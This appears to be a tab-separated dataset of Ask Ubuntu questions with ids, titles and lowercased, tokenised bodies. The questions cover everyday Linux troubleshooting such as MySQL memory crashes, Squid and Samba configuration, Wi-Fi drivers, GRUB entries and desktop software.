422036	games stutter on windowed/dual monitor	i 've noticed a problem with my ubuntu 13.10 installation , where games will stutter when i run them windowed and with my second monitor on . let me elaborate . i have one game running natively , starbound . this game will constantly stutter - like it has low fps , although my pc is more than powerful enough for this game - unless i disable my second monitor and run the game in fullscreen . having my second monitor enabled and fullscreen on , or having my second screen disabled and running the game in windowed , will make it stutter . i have terraria installed wit wine via playonlinux , and it suffers from the same stuttering problem , although i ca n't be sure it 's exactly the same since i ca n't run it in fullscreen ( only fullscreen on the wine desktop window ) . i 'm also currently downloading dmc to see that game stutters as well . edit : i think the stutter with fullscreen+second monitor has something to do with the fact that the game stretches across the two monitors in fullscreen , with black bars on both sides . edit : i checked out minecraft - linux version , and it behaves in the exact same way as starbound . i can now also confirm it is not a framerate problem , as the framerate in mc is a constand 60 ( with vsync on , otherwise it 's 130+ ) . the game also has fullscreen issues with two monitors . my nvidia driver version is 331.20 , and i have 'sync to vblank ' enabled in nvidia-settings .
422037	optimising mysql settings - mysqld running out of memory	i 'm a bit confused about which settings to change in my my.conf file to optimise for my server ( the mysql server keeps crashing due to our high traffic ) . here 's the my.cnf file : [ mysqld ] user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql skip-external-locking key_buffer = 16m max_allowed_packet = 16m myisam-recover = backup # max_connections = 100 # table_cache = 64 # thread_concurrency = 10 query_cache_limit = 1m query_cache_size = 16m and the server specs are : cpu cores 2 cores ram ( memory ) 1gb ssd ( disk space ) 20gb running ubuntu 12.04 lts here are my partitions : name fstype size mountpoint label vda 20g ├─vda1 ext4 476m /boot ├─vda2 swap 477m [ swap ] └─vda3 ext4 19.1g / any help would be much appreciated . looking at the error logs , i can see that mysqld was out of memory : feb 17 11:02:06 111488 kernel : [ 8276839.559141 ] out of memory : kill process 20719 ( mysqld ) score 75 or sacrifice child feb 17 11:02:06 111488 kernel : [ 8276839.559209 ] killed process 20719 ( mysqld ) total-vm:1347424kb , anon-rss:30524kb , file-rss:0kb
422038	is there any software exactly like adobe dreamweaver that works with ubuntu ?	i want to know that is there any web development tool exactly like adobe dreamweaver ? if your answer is yes , please suggest me it and if it is no , please help me to develop it . and that should only work with ubuntu and linux platform .
422039	selinux enforcing mode problem	i install selinux-basics and selinux-policy-default in ubuntu server 13.04 , but when i set selinux in enforcing mode and reboot , my system does n't boot up and i get following error : mountall : mount /run/lock [ 424 ] terminated with status 32 mountall : filesystem could not be mounted : /run/lock mountall : mount /run/shm [ 426 ] terminated with status 32 mountall : filesystem could not be mounted : /run/shm mountall : mount /run/usr [ 427 ] terminated with status 32 mountall : filesystem could not be mounted : /run/usr an error occured while mounting /run/lock
422043	user auth failure	i was trying to change my usernme on ubuntu 12.04 lts by opening terminal and enter this command $ sudo nautilus then , i went to file system > home > alex ( my username ) i right click on alex folder and rename it . when i restart my computer , i can not login as administartor
422045	javascript syntax suggestion is not working in netbeans ide 7.0.1	i am using ubuntu 12.04 and have just installed netbeans ide 7.0.1 and i opend .js file in it but i am seeing it as in normal mode ( like how will see in notepad , gedit ) .. i am not getting any syntax correction or function suggestion box in it.. i have referred this question i am not able to find misc inside options ... can anybody suggest me how to fix this issue ? thanks
422052	how to download and install specific ubuntu version and disable future builds ?	the amd catalystâ˘ 13.12 proprietary linux x86 display driver can be used with ubuntu 12.04.2 and 13.04 and the 14.1 beta version can be used with ubuntu 12.04.3 and 13.10 . since , the beta version is known to have a lot of issues , i need to use the stable driver . unfortunately , it is not working with 13.10 as it said in the documentation . so , i need to download and install 12.04.2 and disable future updates to 12.04.3 for example . how i can do this when the version of the ubuntu that can be downloaded from the official website is 12.04.4 and how can i prevent update to next builds ?
422059	squid dns timeout	every time i try to connect with squid proxy i got this error : the following error was encountered while trying to retrieve the url : http : //google.com/ unable to determine ip address from host name `` google.com '' the dns server returned : refused : the name server refuses to perform the specified operation . this means that the cache was not able to resolve the hostname presented in the url . check if the address is correct . logs 1392635595.842 10003 41.137.74.142 tcp_miss/404 0 connect aus3.mozilla.org:443 - direct/- - 1392636174.237 10002 41.137.74.142 tcp_miss/503 4122 get http : //www.facebook.com/ - direct/www.facebook.com text/code 1392636185.238 10471 41.137.74.142 tcp_miss/503 4200 get http : //www.squid-cache.org/artwork/sn.png - direct/www.squid-cache.org text/code 1392636422.617 10003 41.137.74.142 tcp_miss/503 4374 get http : //google.com/ - direct/google.com text/code 1392636433.619 10699 41.137.74.142 tcp_miss/503 4194 get http : //www.squid-cache.org/artwork/sn.png - direct/www.squid-cache.org text/code 1392636584.839 10004 41.137.74.142 tcp_miss/503 4410 get http : //google.com/ - direct/google.com text/code 1392636595.842 10449 41.137.74.142 tcp_miss/503 4194 get http : //www.squid-cache.org/artwork/sn.png - direct/www.squid-cache.org text/code squid config acl manager proto cache_object acl localhost src 127.0.0.1/32 : :1 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 : :1 acl localnet src 10.0.0.0/8 # rfc1918 possible internal network acl localnet src 172.16.0.0/12 # rfc1918 possible internal network acl localnet src 192.168.0.0/16 # rfc1918 possible internal network acl localnet src fc00 : :/7 # rfc 4193 local private network range acl localnet src fe80 : :/10 # rfc 4291 link-local ( directly plugged ) machines acl ssl_ports port 443 acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect acl kirmi src 41.0.0.0/8 http_access allow manager localhost http_access deny manager http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access allow localhost http_access allow localnet http_access allow kirmi
422060	can you publish your app in software center via a ppa ?	i have my free open source desktop app in a ppa . is it possible to get it in the software center so that it is installed from the ppa ( so that the user do n't need to add my ppa ) ? or should i now use a click package or what ? changing the packaging from .deb is a bit of a pain .
422062	if for a command to check if it succeed	i 'm working on my bash script to create logical volumes . i have this command which i want to put in a if to check of each of these succeed . what is the easiest way to do that ? # ! /bin/bash pvcreate /dev/md5 vgcreate vg0 /dev/md5 lvcreate -l 200mb vg0 -n test
422064	how can i rip a cd in alac or aiff formats ?	i am presently running itunes in a virtualbox with windows 8 to rip my cds to alac or aiff . this is due to historical reasons where i migrated from osx to ubuntu and still love my ipod classic . however i wish to start ripping my cds from ubuntu itself . can anyone suggest the best way to do this and continue to rip to alac and aiff ?
422069	standard open /dev/ttys0	every time i reboot my laptop i need to open terminal and type sudo chmod 777 /dev/ttys0to use the serial port . for configuring cisco routers i want /dev/ttys0 to be open when i boot my laptop . searched the internet but did not find the answer i am looking for .
422071	installation driver rtl8188ce	with sudo nano /etc/modules should i add rtl8192ce or rtl8188ce ? in the https : //github.com/freedomben/rtl8188ce-linux-driver the author say to me : insert rtl8192ce.ko which one is right ?
422072	booting ubuntu from a usb flash device	i have an older bios setup in my laptop which does not have `` boot from a usb device '' option . can i still boot from a usb device . bios version : toshiba v1.40 date : 26-apr-2007
422075	reset keyboard shortcuts to default	i made some changes in keyboard shorcuts and now i do n't know how to restore them to default values . is there any terminal command for this . i do n't want to reset all settings with unity tweak tool , just keyboard shortcuts .
422076	installing ubuntu server in vmware	i have managed to install ubuntu server on vmworkstation , but once i get to log-in screed the whole machine get freezed up ... . any idea why ? or any other patch i need to install in order work this out ? thanks in advance
422078	how do i control the volume in kde from the command line ?	i want to use xbindkeys to set a key combination to increase/decrease the volume , but to do that i need a command to run to change the volume , without having to click the volume icon and change it with the mouse . how can i do this ?
422080	how can i connect very secure remote desktop connection	i am using .pem files to connect ssh connection it 's working with out .pem files we can not connect ssh connection . remote desktop connection only require public ip & password if we know password we can connect anyone any where it is not secure
422081	easy to use and easy to install app needed as a replacement of autocad lt	in our office we use windows 8.1 mostly and some 7 . w7s are ok but 8.1s are not yet bought . let 's say we are `` trying '' them . i have convinced the buying department to use ubuntu since they are only using basic functions of word and excel and outlook . they are very much happier with writer , calc and thunderbird . however , we do very much basic drawing of electrical units , lines , cameras , lambs etc . using autocad for this is really overkill . so no one wants to pay for it ( it is still wrong though ) . so they accepted me looking for totally legal and equally usefull alternatives . i have tried bricscad and draftsight so far with no success.. in turkey linux is very little known , so is methods of installing apps on it . they are so used to click on an exe and `` next '' a few times.. in my unsuccessfull demonstration of installing both apps in 64bit ubuntu 12.04lts ( and 13.10 ) they failed and i could not make them work no matter what . we can not use freecad and librecad since they only work with dxf format and arcitects are sending us the files in dwg format . interestingly , they work pretty well when i try them on a windows environment . but no success on ubuntu , so this makes them think ubuntu is not ready as a daily driver . so basicly , i need to convince them to switch to a ubuntu system with an easily install-able cad program which gives us very basic 2d functions like making lines , polylines and stretching them , working with layers , locking layers , making and editing blocks ( shaped like bulbs , fuses , .. ) , moving , copying etc.. could you advise me some solutions ? easy to be installed and similar to autocad interface if possible . so i can convince everybody . they do not have to be free since they will anyway be very much cheaper than a windows 8.1 + antivirus + office + autocad system : )
422083	server crashed a few times due to lack of memory - how can i find out how much is available to each process ?	we had a huge spike in traffic with lots of these errors : feb 17 10:44:13 111488 kernel : [ 8275767.506198 ] out of memory : kill process 20577 ( apache2 ) score 52 or sacrifice child feb 17 11:02:06 111488 kernel : [ 8276839.559141 ] out of memory : kill process 20719 ( mysqld ) score 75 or sacrifice child as you can see , it 's not just one process but both apache2 and mysqld , so i 've increased the ram on the server . how can i check that this is available to these processes ?
422088	is it possible to disable and enable my trackpad with a keyboard shortcut ?	when i 'm typing in libreoffice i keep accidentally bumping the trackpad . is there a way i can temporarily disable the trackpad with a keyboard shortcut while i 'm typing ? ( i understand there is an option to disable the mouse when typing but when i nudge the trackpad it gets back on anyway . )
422091	u boot building issue in eclipse	i find a link which say we can build u boot in windows with eclipse tool i tried but i stuck in junction command could anyone can help me out any kind of help would we appreciated this is the link which i am trying u boot in eclipse
422092	13.10 samba client fails to log in on samba ( linux pdc ) domain ( where 12.04 client works )	i am attempting to migrate from ubuntu 12.04 to 13.10 and am having some issue being able to log into my samba domain from the 13.10 workstation when i use the same settings on the 12.04 workstation . this is most probably due to the depreciation of smbfs for cifs-utils my working setup on ubuntu 12.04 is as following : samba3 pdc running on ubuntu with an ldap backend workstations running ubuntu 12.04 configured so that a user authenticates to the domain and mounts some shared at login . it also allows fallback to local accounts should they exist . when i configure the 13.10 the same way , i run into errors which do not log me in , saying invalid password . my set up for 12.04 client is as follows relevant packages installed : winbind samba libpam-mount smbfs /etc/hosts 127.0.0.1 localhost test-13 test-13.mydomain 127.0.1.1 test-13 10.1.0.2 dc dc.mydomain /etc/nsswitch.conf passwd : compat winbind group : compat winbind hosts : files dns wins mdns4_minimal mdns4 /etc/samba/smb.conf [ global ] ; workstation settings workgroup = mydomain netbios name = test-13 server string = % h security = domain idmap backend = tdb idmap uid = 15000-20000 idmap gid = 15000-20000 wins server = 10.1.0.2 winbind use default domain = yes winbind enum groups = yes winbind enum users = yes password server = 10.1.0.2 template shell = /bin/bash template homedir = /home/ % d/ % u ; logging log level = 2 log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d i join the domain as follows service smbd restart service nmbd restart service winbind restart net join mydomain which joins the domain successfully i then set up the authentication and mounting of shares /etc/pam.d/common-account account [ success=2 default=ignore ] pam_winbind.so account [ success=1 default=ignore ] pam_unix.so account requisite pam_deny.so account required pam_permit.so /etc/pam.d/common-auth auth [ success=2 default=ignore ] pam_unix.so nullok_secure auth [ success=1 default=ignore ] pam_winbind.so use_first_pass auth requisite pam_deny.so auth optional pam_mount.so auth required pam_permit.so /etc/pam.d/common-session session required pam_unix.so nullok_secure session required pam_mkhomedir.so skel=/etc/skel umask=0022 session optional pam_mount.so session [ default=1 ] pam_permit.so session requisite pam_deny.so session required pam_permit.so session optional pam_ck_connector.so nox11 /etc/security/pam_mount.conf.xml < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype pam_mount system `` pam_mount.conf.xml.dtd '' > < pam_mount > < debug enable= '' 0 '' / > < volume options= '' user= % ( domain_user ) , domain=mydomain '' fstype= '' cifs '' server= '' dc '' path= '' shared '' mountpoint= '' /home/mydomain/ % ( domain_user ) /shared '' > < /volume > < volume options= '' user= % ( domain_user ) , domain=mydomain '' fstype= '' cifs '' server= '' dc '' path= '' % ( domain_user ) '' mountpoint= '' /home/mydomain/ % ( domain_user ) /personal '' > < /volume > < path > /sbin : /bin : /usr/sbin : /usr/bin : /usr/local/sbin : /usr/local/bin < /path > < logout wait= '' 0 '' hup= '' 0 '' term= '' 0 '' kill= '' 0 '' / > < mkmountpoint enable= '' 1 '' remove= '' true '' / > < /pam_mount > the problems arise when i try the above on ubuntu 13.10 . to start with smbfs has been replaced with cifs-utils which at least in what i have seen so far requires me to also install libpam-winbind , though there might be an alternative package i should be installing . once those packages and files are added to ubuntu 13.10 , i reboot and then try to log in but it fails saying invalid password and in auth.log for the workstatoin i see the following : lightdm : pam_unix ( lightdm : auth ) : check pass ; user unknown lightdm : pam_unix ( lightdm : auth ) : authentication failure ; logname= uid=0 euid=0 tty=:0 ruser= rhost= lightdm : pam_winbind ( lightdm : auth ) : getting password ( 0x00000010 ) lightdm : pam_winbind ( lightdm : auth ) : pam_get_item returned a password lightdm : pam_winbind ( lightdm : auth ) : user 'testusr ' granted access lightdm : gkr-pam : error looking up user information lightdm : pam_unix ( lightdm : account ) : could not identify user ( from getpwnam ( testusr ) ) lightdm : pam unable to dlopen ( pam_ck_connector.so ) : /lib/security/pam_ck_connector.so : can not open shared object file : no such file or directory lightdm : pam adding faulty module : pam_ck_connector.so
422093	how to get backports for tomcat ?	i installed tomcat 7 using apt-get utility on my ubuntu server 13.04 . so do i need to manually configure , after this to start receiving backports/fixes for tomcat ? if yes , then how do i confgure ? or ubuntu , by itself , takes care of that ?
422094	why linux does n't provide break-point recovery to restore system to previous safe state ?	many times , i feel need to restore my linux system to some previous safe state . few utility based option such as 'apt-get remove ( for ubuntu ) ' etc are available but are limited to cleaning unwanted software installations only . the need ofcourse is not emerged after looking at windows way of recovery , but its always a good and intuitive option to have system recovery feature inbuilt into the system especially for frequent configuration and development work . may be i 'm unaware but do any linux flavor has such feature inbuilt ?
422102	pptpd vps can not determine ethernet address for proxy arp	here 's the log : http : //imgur.com/fphplue i 've got : /etc/ufw/before.rules *nat : postrouting accept [ 0:0 ] -a postrouting -s 10.99.99.0/24 -o eth0 -j masquerade and : /etc/rc.local iptables -t nat -a postrouting -o eth0 -j masquerade i believe it is something to do with my subnet as i am on a vps ' can not determine ethernet address for proxy arp' can anyone please point me in the right direction ?
422104	howto to assing a second audio automatically to jack or alsa ?	i 'm using a guitar-link ( behringer ucg102 ) over usb , a akai mpk25 masterkeyboard and some software to making music with jack , ardour , hydrogen , zynaddsubfx ... after plug my usb behringer uucg102 in my computer , the interface are shown in cat /proc/asound/cards , but not in jack ( qjackctl ) micha @ 771g : ~ $ cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xd4610000 irq 46 1 [ codec ] : usb-audio - usb audio codec burr-brown from ti usb audio codec at usb-0000:00:14.0-1 , full speed micha @ 771g : ~ $ micha @ 771g : ~ $ aplay -l ** liste der hardware-geräte ( playback ) ** karte 0 : pch [ hda intel pch ] , gerät 0 : alc271x analog [ alc271x analog ] sub-geräte : 0/1 sub-gerät # 0 : subdevice # 0 karte 0 : pch [ hda intel pch ] , gerät 3 : hdmi 0 [ hdmi 0 ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 1 : codec [ usb audio codec ] , gerät 0 : usb audio [ usb audio ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 micha @ 771g : ~ $ i adding this with : alsa_in -dalsa -j '' ucg102_in '' -dhw : codec -r44100 -p1024 -n2 & and now the ucg is shown in qjackctl ... ( this is from manual @ jackaudio.org ) i do n't wish set this card as device for jack but as second device ... howto can i set and see this in qjackctl automatically after plug the usb device ?
422107	wifi local connection or unstable connection only	first time posting here , and one-week on ubuntu 12.04 ( on linux , in reality ) . i 'm having problems with my wireless connection at home only . at the university i can use wireless no problem , but at home it never connects beyond local and/or connects for 5-10 mins and stops working . i know my wifi card is not hard-blocked , from a few commands i saw over the forums to check . the driver i 'm using is the default linux driver ath9k , and my wifi card is qualcomm atheros ar9285 wireless network adapter . searching for it have not wielded me any results ... at home , the wifi is distributed through a router , that i think might be the source of the problem . i have a dual boot machine , with a windows 7 on it , and it works fine . so i know the router is not broken , but may not be corrected configured for the ubuntu os . i even tried installing ndiswrapper to see if windows drivers could help me , but i was n't able to get it installed ( ca n't find linux-headers , although they are there ... ) . any ideas what might be the issue ? i can provide any additional information required . appreciate any help . regards , mihael souza .
422110	how can i disable cpu c2 and c3 states options ?	i have a dell xps 13 9333 . as you can read here , it produces an annoying coil whine under some circumstances : http : //en.community.dell.com/support-forums/laptop/f/3518/t/19538215.aspx someone suggested that the noise can be related to the cpu ( intel core i7 ) cx states . a workaround , under win8.1 , is to disable states c2 and c3 trough the system registry : http : //www.tomshardware.co.uk/forum/292915-30-high-pitched-noise-coming-area # 4294909 do you know how can i disable c2 and c3 states under ubuntu 12.04 , so that i can give the workaround a try ?
422112	evolution override gconftool-2 modification	we are in `` beta-test '' at my job to install some ubuntu ( 12.04 lts ) on the network and we 've got a little problem . we try to `` standardize '' as much as we can ( with script when possible ) and in the case of evolution ( 3.2 , still on gconf right ? ) we run into a problem . for example , if we try to enable `` send as html '' option with the command below : $ gconftool-2 -- set -- type=bool /apps/evolution/mail/composer/send_html true after that we do a -- get of that option to see if the parameter is ok ( we receive true ) $ gconftool-2 -- get /apps/evolution/mail/composer/send_html true but as soon as we open evolution , the parameter is overwritten and return to false i do n't know if it 's just my collegue and me who does n't know how gconftool-2 works or something else . anyway , if you could help us i would be very grateful !
422119	rip audio dvd on ubuntu ?	is there a way to rip audio dvd into 24bit aiff or alac files on ubuntu ?
422122	how to edit grub for many entries of previous kernels with multiple ubuntu installations ?	i have a laptop on which i have installed total 4 operating systems . ubuntu 12.04 64 bit lubuntu 12.04 64 bit one other variant of lubuntu ( customized by and customized for some users ) windows my issue is that whenver i get update for kernel , for any of linux os , the new kernel entry is directly added into grub ..when i had only one os on my pc all old kernel entries used to be shifted in previous linux version option in grub but this does not happen when i have multiple linux installations . as a result my grub has almost 12-13 entries and it is very difficult to select one of them.. ( i know i can remove old kernel versions but still ... ) is there a way to add previous linux version options to all installations in grub ? how to do it ? unfortunately i can not add a screenshot ! ; )
422125	getting error while trying to do software update	i have recently installed ubuntu 12.04 lts on my laptop . when i tried to install a package using terminal i got some errors like it has no installation candidate.for different package also i got the same error.then i tried to do software update of my ubuntu.but when i tried i got the error like - failed to download repository information check your internet connection . since i am well connected to a lan connection , so i do n't think its my network problem , but i do n't know where the problem is.please give me some suggestion .
422127	mac osx 10.9.1 can not detect a specific directory created in ubuntu 12.04	i created a directory on an external hard drive , named `` all_movies '' using my laptop which has ubuntu 12.04 installed . this directory is pretty large ( almost 560 gb ) because of a lot of files . now , when i am trying to access this directory on my mac osx 10.9.1 ( mavericks ) it does n't show up . neither i see this directory in my mac 's file browser nor when i list dirs using : ls -l in terminal . but i do see this in list when i hit tab twice after ls , when i do cd all_movies it throw this error : ls : all_movies : input/output error i have no clue what to do here . please note that this directory shows up perfectly in windows and ubuntu . is there anything wrong with mac or did i missed any metadata for this directory ? edit : when i do : nano all_movies in terminal , it opens an empty file to be written . but , this is a directory . how can this be treated as a file in osx ?
422128	why is the video blinking ?	i recently installed ubuntu 12.04 on my system , and completely installed all the updates on my system . i am having issues with video playback . i was using default media player to play my videos , but since the maximum volume is very low in the default media player , i switched to vlc to play my videos . now , whenever i play any of the videos using vlc , then the screen starts `` blinking '' after every 3-5 seconds , it is really very annoying . thinking that this is a issue with vlc , i installed sm player and played videos on it but the same problem occurs . can anyone tell me how to solve this problem , or increase volume in the default media player ? in case , it matters , i have a samsung laptop , with amd processor
422131	why does n't ps -al display my java programs ?	i do n't understand why ps -al or sudo ps -al wo n't display for instance my java processes . if i do ps -al then i do n't see for example my java jobs but i see them when i do the ( strange and unrecognized ) ps -xal | grep java which probably should be something else . i can also find the java pid by a netstat for the port that the java ( jetty server ) in running on ( port 80 ) , get the pid for the process on port 80 and then kill it by its pid . i does n't seem like sudo killall java works all the time . can you help my with a working strategy how to simplify handling the running of 2-3 jetty instances that only sometimes appear when doing ps -al ? i suppose the best way is to stop jetty similarly to the manner in which it is started i.e . sudo mvn jetty : stop but the jetty manual says that it 's ok to just kill the process , which is faster . ( i often want to restart jetty . )
422133	can i find my car with my portable device ?	is there any software on ubuntu which allows me to find my car with my tablet or cell phone which is running ubuntu touch ? when i lost my car , i would like to use ubuntu touch on my portable device to locate it .
422135	how to get the url from a file using a shell script	i have a file which consists of a url . i 'm trying to get the url from that file using a shell script . in the file , the url is like this : ( 'url ' , 'http : //url.com ' ) ; i tried to use the following : cat file.php | grep 'url ' | awk ' { print $ 2 } ' it gives the output as : 'http : //url.com ' ) ; but i need to get only url.com in a variable inside the shell script . how can i accomplish this ?
422139	simple screen recorder wo n't record speakers	i am having a problem where simple screen record ( with pulse audio ) can either record microphone with no speakers or speakers with no audio . thanks , sam
422140	disconnected from wireless network - ubuntu 12.04 , sony vf	i bought a sony vaio f series ( svf15a1c5e ) recently with windows 8 on it . i installed ubuntu 12.04 and just kept a recovery partition for windows as i do not need it . unfortunately i can not connect to the internet either wired or wireless . i have seen and read the similar topic and tried most of the answers unsuccessfully ( i might have done something wrong when applying the answer to my case though ) i also asked my department it but they could not solve it . the output of lshw -c network is : *-network description : network controller product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 version:01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:16 memory : d1700000-d1707fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0e:00.0 logical name : eth0 version : 0c serial:78:84:3c:3a : cd:7d size : 10mbit/s clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8169g-2_0.0.1 02/06/13 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:46 ioport:2000 ( size=256 ) memory : d1500000-d1500fff memory : d1400000-d1403fff i also edited /etc/networkmanager/networkmanager.conf so that managed=true while it was =false . any suggestions ?
422144	where can i find openjdk jvm crash log	one of my java application crashed . i want to find the jvm log to see what happened . where can i find jvm logs ?
422146	performance improvement of ubuntu on soc board	i am trying to set up ubuntu on soc board ( cubietruck ) which has 8gb flash , 2 gb ram , with external ssd - 128 gb . currently i have installed the ubuntu on hard drive . its performance seems moderate but i believe that moving the some part of os on flash would make it faster . is it possible to run bare essential part of kernel on flash and everything else on ssd . can someone please help me understand how to identify the files to be moved to flash ?
422147	graphics configuration problem on my laptop	i will be really glad if someone help me install graphics on my laptop . i am using dell inspiron n 5110 and have nvidia graphics card . i posted the same question before but was deleted by the administrator . i have ended up installing intel nvidia-current and bumblebee but still the status to my graphics is unknown and low graphics notifications are being displayed ... . ! ! your help will be highly appreciated . i have been using ubuntu since but 2012 but still cant find the to graphics .
422149	compilation help on ubuntu 13.10	i have recently gotten into programming this is a small c code i started on . i am using ubuntu 13.10. int main ( int argc , char *argv [ ] ) { puts ( `` hello world . `` ) ; return 0 ; } whenever i try to compile it using gcc exl.c -o exl1 cc exl.c -o exl1 or anything like that i just keep getting gcc : error : exl.c : no such file or directory gcc : fatal error : no input files compilation terminated . i have no idea what to do any help would be greatly appreciated . p.s . i have already done sudo apt-get install build-essential sudo apt-get update build-essential sudo apt-get upgrade build-essential
422150	slow internet realtek 8188ce	i have ubuntu 13.10 and i have installed the driver for rtl8188ce . i listed old topics , specially 12.10 x64 - rtl8188ce - intermittent/slow internet connection and so i insert putting this into /etc/modprobe.d/rtl8192.conf options rtl8192ce ips=0 fwlps=0 debug=2 then restart , sudo ifconfig wlan0 down & & sudo rmmod -f rtl8192ce & & sudo modprobe rtl8192ce swenc=1 & & sudo ifconfig wlan0 up then restart also this a very high loss % ( 40 % ) in the signal of hostes ... . extreme difference between windows and ubuntu thank you very much
422155	bonjour bridge with avahi	i have two subnets with different devices that announce themselves using the bonjour protocol . since these messages can be only broadcasted in the same subnetwork i installed the avahi daemon . i enabled the reflector option and restarted the server but it wo n't work . i must note that what i have is a machine running ubuntu server 12.04 lts with two interfaces , each connected to one of the two subnets . when the daemon start i can check with 'avahi-browser -ac ' that my server is able to see every device in the two subnets , but for some reason the packages are not broadcasted . here it follows my config file : [ server ] use-ipv4=yes use-ipv6=yes allow-interfaces=p1p1 , p3p1 ratelimit-interval-usec=1000000 ratelimit-burst=1000 [ wide-area ] enable-wide-area=yes [ publish ] [ reflector ] enable-reflector=no [ rlimits ] rlimit-core=0 rlimit-data=4194304 rlimit-fsize=0 rlimit-nofile=768 rlimit-stack=4194304 rlimit-nproc=3 and a small extract from the syslog ( which to me seems everything 's fine ) : feb 17 16:32:59 shuttle avahi-daemon [ 2108 ] : registering new address record for fe80 : :82ee:73ff : fe67 : e587 on p3p1.* . feb 17 16:32:59 shuttle avahi-daemon [ 2108 ] : registering new address record for 192.168.28.27 on p3p1.ipv4 . feb 17 16:32:59 shuttle avahi-daemon [ 2108 ] : registering new address record for fe80 : :82ee:73ff : fe67 : e546 on p1p1.* . feb 17 16:32:59 shuttle avahi-daemon [ 2108 ] : registering new address record for 192.168.38.27 on p1p1.ipv4 . feb 17 16:32:59 shuttle avahi-daemon [ 2108 ] : registering hinfo record with values 'x86_64'/'linux ' . feb 17 16:33:00 shuttle avahi-daemon [ 2108 ] : server startup complete . host name is shuttle.local . local service cookie is 2224955595 . feb 17 16:33:01 shuttle-bcn avahi-daemon [ 2108 ] : service `` shuttle '' ( /services/udisks.service ) successfully established . i even tried enabling ipv4 forwarding between the interfaces ( via /proc/sys/net/ipv4/ip_forward ) but i 'm not able to see all the devices in the different subnets . thanks !
422157	is there an alternative to x2goclient ?	i use lot of x2go sessions and i find the x2goclient in ubuntu rather wasteful of screen space . is there an alternative more streamlined version of the x2goclient ? i am not interested in an alternative to x2go itself , just an alternative to the client it is bundled with . by alternative client i mean an alternative session launcher and manager
422159	dual-booting ubuntu touch and cm11-nightly on nexus 10	i 'm considering dual-booting my trusty nexus 10 with cm11-nightly and ubuntu touch , but read in the wiki that part of the ubuntu installs in the recovery partition and makes booting into recovery not possible ; how , then , would i be able to regularly update by android install ?
422163	black screen with a cursor flashing after ubuntu 's installation	iâve looked in the possible answers but could n't see it there i did all the installing and at the end it said you have successfully installed ubuntu , then it rebooted and asked if i wanted windows 7 or ubuntu again , i clicked on ubuntu then up came 3 generic choices which i have no idea about , i pressed the 1st choice and it went onto a black screen with a cursor flashing on the top left side of the screen ... and that 's all it does . can anyone explain how to do this correctly so iâm able to use ubuntu desktop ?
422165	what is the best way to start developing ubuntu touch apps ?	i 'm a starting programmer and i can write c++ programs ( nothing more or less ) . i want to get started with writing ubuntu touch apps , but i have no idea were to start . should i just jump into it , or should i first learn java or something like that ? thanks in advance ! jorik
422167	vm player 6.01 on win 8.1 . ubuntu on vm , internet connect fail	how do i connect to internet on ubuntu 12.04 installed in a vm player on a win 8 machine ?
422169	i have 2 different versions of nautilus installed somehow , how can i put the 3.6.3 version in the menu in gnome fallback ?	i 'm using ubuntu 12.10 , i used the standard gnome 3 ppa to update all the gnome apps in 12.10 to version 3.6 including nautilus . then i realized that it did n't update rhythmbox to version 2.98 , so i got the gnome shell ppa ( aka the `` ricotz '' testing ppa ) . than i typed sudo apt-get update in the terminal , then i opened the software updater and no new packages were found . so i edit my sources list so that it would get the precise testing packages . i ran sudo apt-get update opened software updater and installed all the updates . after this i went to change the ppa 's file to get quantal packages and so i used sudo nautilus ( note that this was after all the packages were installed and system was restarted ) and i got the 3.6 version . after i wanted to see a document so i opened nautilus from the menu in gnome fallback and i was surprised that i got the 3.4 version ! so then i went in the terminal and typed `` sudo nautilus '' and the 3.6 version showed up ! so i had both the 3.4 and the 3.6 version on my screen ! so what i want to do is not remove the 3.4 version , but add an icon to the gnome fallback menu ( preferably under accesories ) that will launch the 3.6 version as the 3.4 version does some things better and the 3.6 version does somethings better . ( note that the 3.4 version uses the nautilus % u command ) i was told to run some commands in the terminal and here is what i got david @ david-virtualbox : ~ $ nautilus -- version gnome nautilus 3.6.3 david @ david-virtualbox : ~ $ dpkg -l | grep nautilus rc libnautilus-extension1 1:3.2.0-0ubuntu5 amd64 libraries for nautilus components - runtime version ii libnautilus-extension1a 1:3.6.3-0ubuntu6~ubuntu12.10.1 amd64 libraries for nautilus components - runtime version ii nautilus 1:3.6.3-0ubuntu6~ubuntu12.10.1 amd64 file manager and graphical shell for gnome ii nautilus-data 1:3.6.3-0ubuntu6~ubuntu12.10.1 all data files for nautilus ii nautilus-sendto 3.6.0-0ubuntu1 amd64 integrates evolution and pidgin into the nautilus file manager ii nautilus-sendto-empathy 3.6.0.3-0ubuntu1 amd64 gnome multi-protocol chat and call client ( nautilus-sendto plugin ) ii nautilus-share 0.7.3-1ubuntu3 amd64 nautilus extension to share folder using samba david @ david-virtualbox : ~ $ it looks like the 3.4.2 version on the system is a bug . here are some images :
